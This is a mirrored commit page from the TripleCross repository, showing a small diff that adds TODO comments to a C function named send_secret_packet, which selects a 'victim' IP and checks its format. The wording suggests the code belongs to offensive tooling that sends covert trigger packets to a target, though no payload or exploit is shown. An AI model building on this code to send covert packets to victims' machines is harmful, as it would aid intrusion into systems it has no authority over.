mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-22 17:53:06 +08:00
Finished adapting the code to tcp packets (+ researched a lot about xdp and ebpf, we should be OK with xdps, found a lot of ideas)
This commit is contained in:
@@ -119,6 +119,8 @@ char* getLocalIpAddress(){
|
||||
}*/
|
||||
|
||||
void send_secret_packet(char* argv){
|
||||
//TODO revise this, in wireshark it is seen not to be a TCP packet??????
|
||||
//Should be working, it did in other projects
|
||||
char* local_ip = getLocalIpAddress();
|
||||
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
|
||||
check_ip_address_format(argv);
|
||||
|
||||
Reference in New Issue
Block a user